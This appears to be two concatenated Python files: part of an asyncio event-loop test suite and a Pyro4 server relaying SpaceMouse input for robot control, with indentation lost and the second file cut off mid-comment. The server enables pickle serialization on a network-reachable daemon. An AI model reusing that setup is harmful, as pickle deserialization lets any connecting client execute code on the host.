with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
@asyncio.coroutine
def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
@asyncio.coroutine
def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = asyncio.Future(loop=self.loop)
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.run_in_executor(None, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
# After closing the read-end of a pipe, writing to the
# write-end using os.write() fails with errno==EINVAL and
# GetLastError()==ERROR_INVALID_NAME on Windows!?! (Using
# WriteFile() we get ERROR_BROKEN_PIPE as expected.)
self.assertEqual(b'ERR:OSError', proto.data[2])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_wait_no_same_group(self):
# start the new process in a new session
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None,
start_new_session=True)
        _, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
def test_subprocess_exec_invalid_args(self):
@asyncio.coroutine
def connect(**kwds):
yield from self.loop.subprocess_exec(
asyncio.SubprocessProtocol,
'pwd', **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=True))
def test_subprocess_shell_invalid_args(self):
@asyncio.coroutine
def connect(cmd=None, **kwds):
if not cmd:
cmd = 'pwd'
yield from self.loop.subprocess_shell(
asyncio.SubprocessProtocol,
cmd, **kwds)
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(['ls', '-l']))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(universal_newlines=True))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(bufsize=4096))
with self.assertRaises(ValueError):
self.loop.run_until_complete(connect(shell=False))
if sys.platform == 'win32':
class SelectEventLoopTests(EventLoopTestsMixin, test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop()
class ProactorEventLoopTests(EventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.ProactorEventLoop()
if not sslproto._is_sslproto_available():
def test_create_ssl_connection(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_match_failed(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_create_server_ssl_verified(self):
raise unittest.SkipTest("need python 3.5 (ssl.MemoryBIO)")
def test_legacy_create_ssl_connection(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verify_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_match_failed(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_legacy_create_server_ssl_verified(self):
raise unittest.SkipTest("IocpEventLoop incompatible with legacy SSL")
def test_reader_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_reader_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
def test_writer_callback(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_writer_callback_cancel(self):
raise unittest.SkipTest("IocpEventLoop does not have add_writer()")
def test_create_datagram_endpoint(self):
raise unittest.SkipTest(
"IocpEventLoop does not have create_datagram_endpoint()")
def test_remove_fds_after_closing(self):
raise unittest.SkipTest("IocpEventLoop does not have add_reader()")
else:
from asyncio import selectors
class UnixEventLoopTestsMixin(EventLoopTestsMixin):
def setUp(self):
super().setUp()
return
# This watcher is ignored anyway. Avoid the heap of warnings.
watcher = asyncio.SafeChildWatcher()
watcher.attach_loop(self.loop)
asyncio.set_child_watcher(watcher)
def tearDown(self):
asyncio.set_child_watcher(None)
super().tearDown()
def test_get_event_loop_new_process(self):
async def main():
result = await self.loop.run_in_executor(
None, _test_get_event_loop_new_process__sub_proc)
return result
try:
unpatch = self.unpatch_get_running_loop
except AttributeError:
pass
else:
unpatch()
self.assertEqual(
self.loop.run_until_complete(main()),
'hello')
if False and hasattr(selectors, 'KqueueSelector'):
class KqueueEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(
selectors.KqueueSelector())
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
# Issue #20667: KqueueEventLoopTests.test_read_pty_output()
# hangs on OpenBSD 5.5
@unittest.skipIf(sys.platform.startswith('openbsd'),
'test hangs on OpenBSD')
def test_read_pty_output(self):
super().test_read_pty_output()
# kqueue doesn't support character devices (PTY) on Mac OS X older
# than 10.9 (Maverick)
@support.requires_mac_ver(10, 9)
def test_write_pty(self):
super().test_write_pty()
if False and hasattr(selectors, 'EpollSelector'):
class EPollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.EpollSelector())
if False and hasattr(selectors, 'PollSelector'):
class PollEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
return asyncio.SelectorEventLoop(selectors.PollSelector())
# Should always exist.
class TrioEventLoopTests(UnixEventLoopTestsMixin,
SubprocessTestsMixin,
test_utils.TestCase):
def create_event_loop(self):
import trio_asyncio.sync
return trio_asyncio.sync.SyncTrioEventLoop()
def noop(*args, **kwargs):
pass
class HandleTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
self.loop.get_debug.return_value = True
def test_handle(self):
def callback(*args):
return args
args = ()
h = asyncio.Handle(callback, args, self.loop)
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
h.cancel()
self.assertTrue(h._cancelled)
def test_callback_with_exception(self):
def callback():
raise ValueError()
self.loop = mock.Mock()
self.loop.call_exception_handler = mock.Mock()
h = asyncio.Handle(callback, (), self.loop)
h._run()
self.loop.call_exception_handler.assert_called_with({
'message': test_utils.MockPattern('Exception in callback.*'),
'exception': mock.ANY,
'handle': h,
'source_traceback': h._source_traceback,
})
def test_handle_weakref(self):
wd = weakref.WeakValueDictionary()
h = asyncio.Handle(lambda: None, (), self.loop)
wd['h'] = h # Would fail without __weakref__ slot.
def test_handle_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s>'
% (filename, lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<Handle cancelled>')
# decorated function
cb = asyncio.coroutine(noop)
h = asyncio.Handle(cb, (), self.loop)
self.assertEqual(repr(h),
'<Handle noop() at %s:%s>'
% (filename, lineno))
# partial function
cb = functools.partial(noop, 1, 2)
h = asyncio.Handle(cb, (3,), self.loop)
regex = (r'^<Handle noop\(1, 2\)\(3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial function with keyword args
cb = functools.partial(noop, x=1)
h = asyncio.Handle(cb, (2, 3), self.loop)
regex = (r'^<Handle noop\(x=1\)\(2, 3\) at %s:%s>$'
% (re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
# partial method
if sys.version_info >= (3, 4):
method = HandleTests.test_handle_repr
cb = functools.partialmethod(method)
filename, lineno = test_utils.get_function_source(method)
h = asyncio.Handle(cb, (), self.loop)
cb_regex = r'<function HandleTests.test_handle_repr .*>'
cb_regex = (r'functools.partialmethod\(%s, , \)\(\)' % cb_regex)
regex = (r'^<Handle %s at %s:%s>$'
% (cb_regex, re.escape(filename), lineno))
self.assertRegex(repr(h), regex)
def test_handle_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.Handle(noop, (1, 2), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<Handle noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# double cancellation won't overwrite _repr
h.cancel()
self.assertEqual(
repr(h),
'<Handle cancelled noop(1, 2) at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
    @pytest.mark.skip("Tracebacks don't look the same in trio-asyncio")
def test_handle_source_traceback(self):
loop = asyncio.get_event_loop_policy().new_event_loop()
loop.set_debug(True)
self.set_event_loop(loop)
def check_source_traceback(h):
lineno = sys._getframe(1).f_lineno - 1
self.assertIsInstance(h._source_traceback, list)
self.assertEqual(h._source_traceback[-1][:3],
(__file__,
lineno,
'test_handle_source_traceback'))
# call_soon
h = loop.call_soon(noop)
check_source_traceback(h)
# call_soon_threadsafe
h = loop.call_soon_threadsafe(noop)
check_source_traceback(h)
# call_later
h = loop.call_later(0, noop)
check_source_traceback(h)
# call_at
        h = loop.call_at(loop.time(), noop)
check_source_traceback(h)
@unittest.skipUnless(hasattr(collections.abc, 'Coroutine'),
'No collections.abc.Coroutine')
def test_coroutine_like_object_debug_formatting(self):
# Test that asyncio can format coroutines that are instances of
        # collections.abc.Coroutine, but lack cr_code or gi_code attributes
# (such as ones compiled with Cython).
class Coro:
def send(self, v):
pass
def throw(self, *exc):
pass
def close(self):
pass
def __await__(self):
pass
coro = Coro()
coro.__name__ = 'AAA'
self.assertTrue(asyncio.iscoroutine(coro))
self.assertEqual(coroutines._format_coroutine(coro), 'AAA()')
coro.__qualname__ = 'BBB'
self.assertEqual(coroutines._format_coroutine(coro), 'BBB()')
coro.cr_running = True
self.assertEqual(coroutines._format_coroutine(coro), 'BBB() running')
coro = Coro()
# Some coroutines might not have '__name__', such as
# built-in async_gen.asend().
self.assertEqual(coroutines._format_coroutine(coro), 'Coro()')
class TimerTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.loop = mock.Mock()
def test_hash(self):
when = time.monotonic()
h = asyncio.TimerHandle(when, lambda: False, (),
mock.Mock())
self.assertEqual(hash(h), hash(when))
def test_timer(self):
def callback(*args):
return args
args = (1, 2, 3)
when = time.monotonic()
h = asyncio.TimerHandle(when, callback, args, mock.Mock())
self.assertIs(h._callback, callback)
self.assertIs(h._args, args)
self.assertFalse(h._cancelled)
# cancel
h.cancel()
self.assertTrue(h._cancelled)
self.assertIsNone(h._callback)
self.assertIsNone(h._args)
# when cannot be None
self.assertRaises(AssertionError,
asyncio.TimerHandle, None, callback, args,
self.loop)
def test_timer_repr(self):
self.loop.get_debug.return_value = False
# simple function
h = asyncio.TimerHandle(123, noop, (), self.loop)
src = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() at %s:%s>' % src)
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123>')
def test_timer_repr_debug(self):
self.loop.get_debug.return_value = True
# simple function
create_filename = __file__
create_lineno = sys._getframe().f_lineno + 1
h = asyncio.TimerHandle(123, noop, (), self.loop)
filename, lineno = test_utils.get_function_source(noop)
self.assertEqual(repr(h),
'<TimerHandle when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
# cancelled handle
h.cancel()
self.assertEqual(repr(h),
'<TimerHandle cancelled when=123 noop() '
'at %s:%s created at %s:%s>'
% (filename, lineno, create_filename, create_lineno))
def test_timer_comparison(self):
def callback(*args):
return args
when = time.monotonic()
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when, callback, (), self.loop)
# TODO: Use assertLess etc.
self.assertFalse(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertTrue(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertFalse(h2 > h1)
self.assertTrue(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertTrue(h1 == h2)
self.assertFalse(h1 != h2)
h2.cancel()
self.assertFalse(h1 == h2)
h1 = asyncio.TimerHandle(when, callback, (), self.loop)
h2 = asyncio.TimerHandle(when + 10.0, callback, (), self.loop)
self.assertTrue(h1 < h2)
self.assertFalse(h2 < h1)
self.assertTrue(h1 <= h2)
self.assertFalse(h2 <= h1)
self.assertFalse(h1 > h2)
self.assertTrue(h2 > h1)
self.assertFalse(h1 >= h2)
self.assertTrue(h2 >= h1)
self.assertFalse(h1 == h2)
self.assertTrue(h1 != h2)
h3 = asyncio.Handle(callback, (), self.loop)
self.assertIs(NotImplemented, h1.__eq__(h3))
self.assertIs(NotImplemented, h1.__ne__(h3))
class AbstractEventLoopTests(unittest.TestCase):
def test_not_implemented(self):
f = mock.Mock()
loop = asyncio.AbstractEventLoop()
self.assertRaises(
NotImplementedError, loop.run_forever)
self.assertRaises(
NotImplementedError, loop.run_until_complete, None)
self.assertRaises(
NotImplementedError, loop.stop)
self.assertRaises(
NotImplementedError, loop.is_running)
self.assertRaises(
NotImplementedError, loop.is_closed)
self.assertRaises(
NotImplementedError, loop.close)
self.assertRaises(
NotImplementedError, loop.create_task, None)
self.assertRaises(
NotImplementedError, loop.call_later, None, None)
self.assertRaises(
NotImplementedError, loop.call_at, f, f)
self.assertRaises(
NotImplementedError, loop.call_soon, None)
self.assertRaises(
NotImplementedError, loop.time)
self.assertRaises(
NotImplementedError, loop.call_soon_threadsafe, None)
self.assertRaises(
NotImplementedError, loop.run_in_executor, f, f)
self.assertRaises(
NotImplementedError, loop.set_default_executor, f)
self.assertRaises(
NotImplementedError, loop.getaddrinfo, 'localhost', 8080)
self.assertRaises(
NotImplementedError, loop.getnameinfo, ('localhost', 8080))
self.assertRaises(
NotImplementedError, loop.create_connection, f)
self.assertRaises(
NotImplementedError, loop.create_server, f)
self.assertRaises(
NotImplementedError, loop.create_datagram_endpoint, f)
self.assertRaises(
NotImplementedError, loop.add_reader, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_reader, 1)
self.assertRaises(
NotImplementedError, loop.add_writer, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_writer, 1)
self.assertRaises(
NotImplementedError, loop.sock_recv, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_sendall, f, 10)
self.assertRaises(
NotImplementedError, loop.sock_connect, f, f)
self.assertRaises(
NotImplementedError, loop.sock_accept, f)
self.assertRaises(
NotImplementedError, loop.add_signal_handler, 1, f)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.remove_signal_handler, 1)
self.assertRaises(
NotImplementedError, loop.connect_read_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.connect_write_pipe, f,
mock.sentinel.pipe)
self.assertRaises(
NotImplementedError, loop.subprocess_shell, f,
mock.sentinel)
self.assertRaises(
NotImplementedError, loop.subprocess_exec, f)
self.assertRaises(
NotImplementedError, loop.set_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.default_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.call_exception_handler, f)
self.assertRaises(
NotImplementedError, loop.get_debug)
self.assertRaises(
NotImplementedError, loop.set_debug, f)
class ProtocolsAbsTests(unittest.TestCase):
def test_empty(self):
f = mock.Mock()
p = asyncio.Protocol()
self.assertIsNone(p.connection_made(f))
self.assertIsNone(p.connection_lost(f))
self.assertIsNone(p.data_received(f))
self.assertIsNone(p.eof_received())
dp = asyncio.DatagramProtocol()
self.assertIsNone(dp.connection_made(f))
self.assertIsNone(dp.connection_lost(f))
self.assertIsNone(dp.error_received(f))
self.assertIsNone(dp.datagram_received(f, f))
sp = asyncio.SubprocessProtocol()
self.assertIsNone(sp.connection_made(f))
self.assertIsNone(sp.connection_lost(f))
self.assertIsNone(sp.pipe_data_received(1, f))
self.assertIsNone(sp.pipe_connection_lost(1, f))
self.assertIsNone(sp.process_exited())
class PolicyTests(unittest.TestCase):
def test_event_loop_policy(self):
policy = asyncio.AbstractEventLoopPolicy()
self.assertRaises(NotImplementedError, policy.get_event_loop)
self.assertRaises(NotImplementedError, policy.set_event_loop, object())
self.assertRaises(NotImplementedError, policy.new_event_loop)
self.assertRaises(NotImplementedError, policy.get_child_watcher)
self.assertRaises(NotImplementedError, policy.set_child_watcher,
object())
def test_get_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
self.assertIsNone(policy._local._loop)
loop = policy.get_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
self.assertIs(policy._local._loop, loop)
self.assertIs(loop, policy.get_event_loop())
loop.close()
def test_get_event_loop_calls_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
with mock.patch.object(
policy, "set_event_loop",
wraps=policy.set_event_loop) as m_set_event_loop:
loop = policy.get_event_loop()
# policy._local._loop must be set through .set_event_loop()
# (the unix DefaultEventLoopPolicy needs this call to attach
# the child watcher correctly)
m_set_event_loop.assert_called_with(loop)
loop.close()
def test_get_event_loop_after_set_none(self):
policy = asyncio.DefaultEventLoopPolicy()
policy.set_event_loop(None)
self.assertRaises(RuntimeError, policy.get_event_loop)
@mock.patch('asyncio.events.threading.current_thread')
def test_get_event_loop_thread(self, m_current_thread):
def f():
policy = asyncio.DefaultEventLoopPolicy()
self.assertRaises(RuntimeError, policy.get_event_loop)
th = threading.Thread(target=f)
th.start()
th.join()
def test_new_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
loop = policy.new_event_loop()
self.assertIsInstance(loop, asyncio.AbstractEventLoop)
loop.close()
def test_set_event_loop(self):
policy = asyncio.DefaultEventLoopPolicy()
old_loop = policy.get_event_loop()
self.assertRaises(AssertionError, policy.set_event_loop, object())
loop = policy.new_event_loop()
policy.set_event_loop(loop)
self.assertIs(loop, policy.get_event_loop())
self.assertIsNot(old_loop, policy.get_event_loop())
loop.close()
old_loop.close()
def test_get_event_loop_policy(self):
policy = asyncio.get_event_loop_policy()
self.assertIsInstance(policy, asyncio.AbstractEventLoopPolicy)
self.assertIs(policy, asyncio.get_event_loop_policy())
def test_set_event_loop_policy(self):
self.assertRaises(
AssertionError, asyncio.set_event_loop_policy, object())
old_policy = asyncio.get_event_loop_policy()
policy = asyncio.DefaultEventLoopPolicy()
asyncio.set_event_loop_policy(policy)
self.assertIs(policy, asyncio.get_event_loop_policy())
self.assertIsNot(policy, old_policy)
def test_get_event_loop_returns_running_loop(self):
class Policy(asyncio.DefaultEventLoopPolicy):
def get_event_loop(self):
raise NotImplementedError
loop = None
old_policy = asyncio.get_event_loop_policy()
try:
asyncio.set_event_loop_policy(Policy())
loop = asyncio.new_event_loop()
self.assertIs(asyncio._get_running_loop(), None)
async def func():
self.assertIs(asyncio.get_event_loop(), loop)
self.assertIs(asyncio._get_running_loop(), loop)
loop.run_until_complete(func())
finally:
asyncio.set_event_loop_policy(old_policy)
if loop is not None:
loop.close()
self.assertIs(asyncio._get_running_loop(), None)
if __name__ == '__main__':
unittest.main()
|
input_server.py
|
# First, start the name server: python -m Pyro4.naming
# (a hedged client-side usage sketch follows start_server() below)
import Pyro4
from threading import Thread
import time
import numpy as np
from rlkit.launchers import config
# HOSTNAME = "192.168.0.102"
Pyro4.config.SERIALIZERS_ACCEPTED = {'pickle', 'json', 'marshal', 'serpent'}
Pyro4.config.SERIALIZER = 'pickle'
device_state = None
@Pyro4.expose
class DeviceState(object):
state = None
def get_state(self):
return device_state
# return self.state
def set_state(self, state):
# print("set", state)
# self.state = state
global device_state
device_state = state
class SpaceMouseExpert:
def __init__(
self,
xyz_dims=3,
xyz_remap=[0, 1, 2],
xyz_scale=[1, 1, 1],
xyz_abs_threshold=0.0,
rot_dims=3,
rot_remap=[0, 1, 2],
rot_scale=[1, 1, 1],
rot_abs_threshold=0.0,
rot_discrete=False,
min_clip=-np.inf,
max_clip=np.inf
):
"""TODO: fill in other params"""
self.xyz_dims = xyz_dims
self.xyz_remap = np.array(xyz_remap)
self.xyz_scale = np.array(xyz_scale)
self.xyz_abs_threshold = xyz_abs_threshold
self.rot_dims = rot_dims
self.rot_remap = rot_remap
self.rot_scale = rot_scale
self.rot_abs_threshold = rot_abs_threshold
self.rot_discrete = rot_discrete
self.min_clip = min_clip
self.max_clip = max_clip
        self.thread = Thread(target=start_server)
self.thread.daemon = True
self.thread.start()
self.device_state = DeviceState()
def get_action(self, obs):
"""Must return (action, valid, reset, accept)"""
state = self.device_state.get_state()
# time.sleep(0.1)
if state is None:
return None, False, False, False
dpos, rotation, roll, pitch, yaw, accept, reset = (
state["dpos"],
state["rotation"],
state["roll"],
state["pitch"],
state["yaw"],
state["grasp"], #["left_click"],
state["reset"], #["right_click"],
)
xyz = dpos[self.xyz_remap]
xyz[np.abs(xyz) < self.xyz_abs_threshold] = 0.0
xyz = xyz * self.xyz_scale
xyz = np.clip(xyz, self.min_clip, self.max_clip)
rot = np.array([roll, pitch, yaw])
rot[np.abs(rot) < self.rot_abs_threshold] = 0.0
if self.rot_discrete:
max_i = np.argmax(np.abs(rot))
for i in range(len(rot)):
if i != max_i:
rot[i] = 0.0
rot = rot * self.rot_scale
rot = np.clip(rot, self.min_clip, self.max_clip)
a = np.concatenate([xyz[:self.xyz_dims], rot[:self.rot_dims]])
valid = not np.all(np.isclose(a, 0))
# print(a, roll, pitch, yaw, valid)
return (a, valid, reset, accept)
def start_server():
daemon = Pyro4.Daemon(config.SPACEMOUSE_HOSTNAME)
ns = Pyro4.locateNS() # find the name server
    uri = daemon.register(DeviceState) # register the DeviceState class as a Pyro object
    ns.register("example.greeting", uri) # register it under a name in the name server
print("uri:", uri)
print("Server ready.")
daemon.requestLoop() # start the event loop of the server to wait for calls
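# Hedged client-side sketch, added for illustration (not part of the original
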